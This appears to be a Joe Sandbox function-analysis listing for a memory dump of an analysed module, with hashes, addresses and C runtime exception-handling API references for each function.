Opcode ID: d7047f7a03bd078147a2f6fc2f01744d855844a9a35279cf36911de18e89c076
Instruction ID: 0a68e1c74e9764dfa3709c3f6d337a35650419004c59ea74daa756f47a5957be
Opcode Fuzzy Hash: d7047f7a03bd078147a2f6fc2f01744d855844a9a35279cf36911de18e89c076
Instruction Fuzzy Hash: 2CF089728151086FD700DF99D901ADB7BB89F15344F20C16AD80957B50EB30E6148BA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25F18

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE25F2D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE25F26

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 9be174362d2e504e81500842f838cf28f2df91a34495e7196ff13d22f5febd98
Instruction ID: 470078ba51679e41dee7bdb72dd6476b2417c2ec22b632a808369ff6b831a65a
Opcode Fuzzy Hash: 9be174362d2e504e81500842f838cf28f2df91a34495e7196ff13d22f5febd98
Instruction Fuzzy Hash: 4FF0AE72C151086FD700DF99D9029DA77F89F15344F20C16AE80957750EB30E604CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25E40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25E68

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE25E7D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE25E76

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: fc669fba6b04bad6daedc03112a89e0ff3f84ea1ec57f41683ba97a2af735a29
Instruction ID: cb0b47f6dd73ad8983550475494dd27cf823cea1aa13edb820b0348f69dd7626
Opcode Fuzzy Hash: fc669fba6b04bad6daedc03112a89e0ff3f84ea1ec57f41683ba97a2af735a29
Instruction Fuzzy Hash: 82F0AE72C1510C6FD700DF99D9019DB77F89F15344F10C26AD80997750EB70EA048BE5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25FB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25FD8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE25FED

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE25FE6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: ac4f0d5ccaabb7cfadefd53c47476d9a9e68e7022c5750ef839710afb778a107
Instruction ID: a70af746f8d7652ce2d423b80f8480e27751e1598e0150f40762b67a56af20f8
Opcode Fuzzy Hash: ac4f0d5ccaabb7cfadefd53c47476d9a9e68e7022c5750ef839710afb778a107
Instruction Fuzzy Hash: 92F0A772C152086FD700DF99D9029DA77F8AF15344F20C26AE8099BB50EF30EA088BE5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE51F20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE51F48

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE51F5D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE51F56

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 73db42fdef90f3fa6bb92d5ff627d98955c2f38a7342ce305636d04ccd4fcb0f
Instruction ID: ca0f60684e702a620dadb1c0a40002746a87c154193e321136c2920d706d2294
Opcode Fuzzy Hash: 73db42fdef90f3fa6bb92d5ff627d98955c2f38a7342ce305636d04ccd4fcb0f
Instruction Fuzzy Hash: 41F08272C142086BD700DF99E8029DE77B8AF15744F60C26AE809A7B50EB31E6188BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE399F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE39A18

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE39A2D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE39A26

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 816aba0a0ee01909fe7c8527093b68b6a0b78226ab111777fc322608d5c43918
Instruction ID: a8a1f572364361e981a41b5f408df51895dab62a3128ec7f2a4229fdc14e2247
Opcode Fuzzy Hash: 816aba0a0ee01909fe7c8527093b68b6a0b78226ab111777fc322608d5c43918
Instruction Fuzzy Hash: 68F082728152086FD700DF99D9429DA77B8AF15344F20C26AEC09A7B50EF30F608CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE39AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE39B18

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE39B2D

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE39B26

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 6c984d7597e959deb9f7f3dc57034d9754e806d3b7af450234bceee8c0dc17db
Instruction ID: 40f18834add124cd81cbb46dfad4d899791c2a3ee099e116678c53f40e95831e
Opcode Fuzzy Hash: 6c984d7597e959deb9f7f3dc57034d9754e806d3b7af450234bceee8c0dc17db
Instruction Fuzzy Hash: BFF082B28102086FD700DF99D9429DA77B8AF15344F20C26AE80997B50EF30E608CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE39A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE39A98

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE39AAD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE39AA6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: 5017ab2c06b29fab65c58eca2f66242ee69a82b20a4c5dc0b938527e62c526c9
Instruction ID: 138bd888160352cca0b1fee1d02c03cf696bb2ba13d7ace147d29b0ce9febfb6
Opcode Fuzzy Hash: 5017ab2c06b29fab65c58eca2f66242ee69a82b20a4c5dc0b938527e62c526c9
Instruction Fuzzy Hash: 76F0A7728152086AC700DF98E9429DA7BBC5F15344F14C2AAEC4D97B50FF70E608CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE25B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE25BB8

Part of subcall function 6CE89533: std::exception::_Copy_str.LIBCMT ref: 6CE8954E

__CxxThrowException@8.LIBCMT ref: 6CE25BCD

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

0Bl, xrefs: 6CE25BC6

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
String ID: 0Bl
API String ID: 2299493649-3271211234
Opcode ID: bb2dc9d4259ff371b45654ee8d24dc6add3ff5ae2b69128a78f85bf86eea24fe
Instruction ID: a0a3b229c7af49fe43e1b9c52b628e3c04fc23c2c2ea5b7094d8363c2141b578
Opcode Fuzzy Hash: bb2dc9d4259ff371b45654ee8d24dc6add3ff5ae2b69128a78f85bf86eea24fe
Instruction Fuzzy Hash: EBF0A772C152086FD700DF99D902ADA77F8AF15344F20C26AE8099BB50EB30E6188BE5

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5AFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE5AFE2
__CxxThrowException@8.LIBCMT ref: 6CE5AFF9

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Strings

0Bl, xrefs: 6CE5AFF1

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: e290338a2cd0169fc9b774b3d7035496e754aa8c64fa22eb105bdab257d3d955
Instruction ID: 30db53fbecf4bfbdae767115764f4e877ffdedb33c845b7d58bca9076a7156c9
Opcode Fuzzy Hash: e290338a2cd0169fc9b774b3d7035496e754aa8c64fa22eb105bdab257d3d955
Instruction Fuzzy Hash: 50F012B25552015BE344DBA4DD527BAB3F49B90708F64482C9449C1A54FB39D55CC633

Uniqueness

Uniqueness Score: -1.00%

Function 6CE5AF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE5AF7A
__CxxThrowException@8.LIBCMT ref: 6CE5AF91

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Strings

0Bl, xrefs: 6CE5AF89

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: 43c8a6ce0618fec14bacb66817e15fb30540305821a22136805a53da0ada0c3d
Instruction ID: bd0c8cf50a5e873507dc532bab55548c4ea1c7a79fe7fac6ffdf9a1a4277bfca
Opcode Fuzzy Hash: 43c8a6ce0618fec14bacb66817e15fb30540305821a22136805a53da0ada0c3d
Instruction Fuzzy Hash: 41F030B29052026FD344DBA4D952ABBB3F49F90649F64882CE54982B40FB31D61C8537

Uniqueness

Uniqueness Score: -1.00%

Function 6CE249C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE249EF
__CxxThrowException@8.LIBCMT ref: 6CE24A04

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Strings

0Bl, xrefs: 6CE249E5, 6CE249F9, 6CE249FD, 6CE249FC

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
Opcode ID: 1d7396b4f2ea84f810de71f6840415483191ece8ef1bc015b94fe0077514fd35
Instruction ID: f39f9d8781b432ea7bdd24a78103804dabc7d5f305bd000a954f81ab05af775b
Opcode Fuzzy Hash: 1d7396b4f2ea84f810de71f6840415483191ece8ef1bc015b94fe0077514fd35
Instruction Fuzzy Hash: E6E065B191520866DB09DFE4D851BEE777C9F10358F20926EAD1951A80FB34E2088AA9

Uniqueness

Uniqueness Score: -1.00%

Function 6CE93EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6CE93ED9
DName::DName.LIBCMT ref: 6CE93EE5

Strings

{flat}, xrefs: 6CE93ED4

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: 0ff2eb8b0c3f7c4529f0ec59dd33991ce2f0b99e22d33ccc856e9bd99bef9587
Instruction ID: ddb9e02554bab3220c0e8bdf2142f4178411af9ffba03ff9be465ce085b670bb
Opcode Fuzzy Hash: 0ff2eb8b0c3f7c4529f0ec59dd33991ce2f0b99e22d33ccc856e9bd99bef9587
Instruction Fuzzy Hash: EEF03975241248AFCB10DF58C4A4BA83BB19B8279AF24C086FA5C0FB52C732E942CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6CE80E20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CE80E5A
__CxxThrowException@8.LIBCMT ref: 6CE80E71

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

Strings

0Bl, xrefs: 6CE80E69

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: 0Bl
API String ID: 4063778783-3271211234
